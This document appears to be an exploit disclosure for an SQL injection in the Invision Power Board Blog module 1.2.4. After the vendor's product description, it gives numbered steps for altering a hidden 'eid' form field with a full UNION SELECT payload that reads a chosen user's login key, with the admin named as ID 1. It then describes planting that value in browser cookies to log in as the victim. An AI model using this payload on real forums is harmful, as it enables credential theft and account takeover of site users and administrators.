Invision Power Board (IPB) is "a professional forum system that has been built from the ground up with speed and security in mind, taking advantage of object oriented code, highly-optimized SQL queries, and the fast PHP engine. A comprehensive administration control panel is included to help you keep your board running smoothly. Moderators will also enjoy the full range of options available to them via built-in tools and moderators control panel. Members will appreciate the ability to subscribe to topics, send private messages, and perform a host of other options through the user control panel. It is used by millions of people over the world"
An SQL injection vulnerability found in Invision Power Board Blog module version 1.2.4 allows attackers to run SQL queries and obtain users passwords.
Exploit:
1. Open any blog entry
2. Try to reply to any message
3. Push "Preview message" button (Do not post your reply)
4. Save source code of opened page to your PC
5. Find this string <input type='hidden' name='eid' value='BLOG_ENTRY_ID' />
6. Change BLOG_ENTRY_ID with this SQL Injection: BLOG_ENTRY_ID UNION SELECT b.entry_id, b.blog_id, b.category_id, b.entry_author_id, b.entry_author_name, b.entry_date, member_login_key, b.entry_category, b.entry, b.entry_status, b.entry_locked, b.entry_num_comments, b.entry_last_comment, b.entry_last_comment_date, b.entry_last_comment_name, b.entry_last_comment_mid, b.entry_queued_comments, b.entry_has_attach, b.entry_post_key, b.entry_edit_time, b.entry_edit_name, b.entry_html_state, b.entry_use_emo, b.entry_trackbacks, b.entry_sent_trackbacks, b.entry_last_update, b.entry_gallery_album, b.entry_poll_state, b.entry_last_vote FROM ibf_members, ibf_blog_entries b WHERE id=USER_ID and b.entry_id=BLOG_ENTRY_ID LIMIT 1,1
USER_ID - ID of the user whom password you want to get (admin user id is 1).
7. Push "Preview Button" again.
8. After refresh instead of blog entry name you will get users's HASH password.
9. Change your cookies in your favorite browser and open board. You will be automaticaly logged in as the user whom password you just got.
